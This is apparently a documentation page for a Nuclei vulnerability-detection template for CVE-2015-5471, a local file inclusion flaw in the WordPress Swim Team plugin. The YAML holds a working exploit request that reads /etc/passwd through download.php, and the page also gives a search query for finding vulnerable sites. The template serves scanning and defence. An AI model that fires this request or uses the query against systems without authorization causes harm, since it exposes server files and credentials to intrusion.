Skip to content
Nuclei Templates

Swim Team <= v1.44.10777 - Local File Inclusion

ID: CVE-2015-5471

Severity: medium

Author: 0x_Akoko

Tags: cve2015,cve,wordpress,wp-plugin,lfi,wpscan,packetstorm,swim_team_project

Description

Section titled “Description”

The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.

YAML Source

Section titled “YAML Source”
id: CVE-2015-5471


info:
  name: Swim Team <= v1.44.10777 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.
  impact: |
    An attacker can exploit this vulnerability to read sensitive information from the server, such as database credentials, and potentially execute arbitrary code.
  remediation: Upgrade to Swim Team version 1.45 or newer.
  reference:
    - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
    - http://www.vapid.dhs.org/advisory.php?v=134
    - https://nvd.nist.gov/vuln/detail/CVE-2015-5471
    - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html
    - http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2015-5471
    cwe-id: CWE-22
    epss-score: 0.14014
    epss-percentile: 0.95676
    cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: swim_team_project
    product: swim_team
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/wp-swimteam"
  tags: cve2015,cve,wordpress,wp-plugin,lfi,wpscan,packetstorm,swim_team_project


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 490a00463044022033dcfc847cab5dd816c93ed94194b777dc985572aee8503e76c062f572b93c6102202743ec906ef706edcf9b3dc3c31f312b509af48e748278d09dccd208ab470195:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-5471.yaml"

View on Github